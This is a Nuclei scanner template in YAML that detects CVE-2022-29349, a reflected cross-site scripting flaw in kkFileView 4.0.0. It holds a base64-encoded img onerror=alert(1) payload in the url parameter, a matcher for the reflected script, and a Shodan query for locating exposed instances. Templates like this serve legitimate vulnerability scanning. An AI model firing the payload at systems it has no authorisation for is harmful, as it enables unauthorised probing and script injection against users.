51 lines
1.6 KiB
YAML
51 lines
1.6 KiB
YAML
id: CVE-2022-29349
|
|
|
|
info:
|
|
name: kkFileView 4.0.0 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
|
|
remediation: |
|
|
Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability.
|
|
reference:
|
|
- https://github.com/kekingcn/kkFileView/issues/347
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29349
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-29349
|
|
cwe-id: CWE-79
|
|
epss-score: 0.03708
|
|
epss-percentile: 0.90732
|
|
cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: keking
|
|
product: kkfileview
|
|
shodan-query: http.html:"kkFileView"
|
|
tags: cve,cve2022,kkFileView,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'txt"><img src=111 onerror=alert(1)>123'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220280e350f9ca7b2399f4b2a64df408997cf2bd9f4f6ad458e67a1d15f8d90236702206019b7817032d8ba14fc212620d02d15d8412c179dcce161586c7f296e5bf543:922c64590222798bb761d5b6d8e72950
|